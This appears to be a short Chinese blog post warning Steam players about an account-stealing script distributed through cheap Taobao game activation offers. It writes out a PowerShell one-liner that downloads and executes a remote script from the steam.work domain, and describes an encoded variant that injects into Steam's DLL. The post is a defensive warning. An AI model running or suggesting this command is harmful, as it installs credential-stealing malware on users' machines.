Meina

Cisco R&S CCIE/CISSP/RHCE

少于 1 分钟阅读

确认以下事件

无登录记录

无启用APIToken

邮箱安全

近期误点击脚本(或淘宝购买低价游戏的激活脚本)警告 以下命令严禁执行

powershell 
irm steam.work|iex

irm是由公网下载脚本执行,steam.work是脚本地址,iex是传递命令

powershell -encodedCommand "XXXX(base64加密内容,此处不展示)"

解密后从公网下载内容并注入steam的dll。 经确认,此文件为盗号病毒。

文件分析

域名分析

域名脚本分析

目前,steam.work已自动跳转steam官方页面(严禁通过此域名访问),持续关注中 另,近期淘宝低价游戏(需要下载登陆器或执行命令后激活的)不要购买!!!

同证书可疑域名(threatbook,放心打开)

参考链接

标签:

分类:

更新时间:

猜您还喜欢

临时用云运维面试

少于 1 分钟阅读

基本掌握 Linux 从进程、资源、任务、文件、软件包、磁盘等管理方法; https://cloud.tencent.com/developer/article/1540697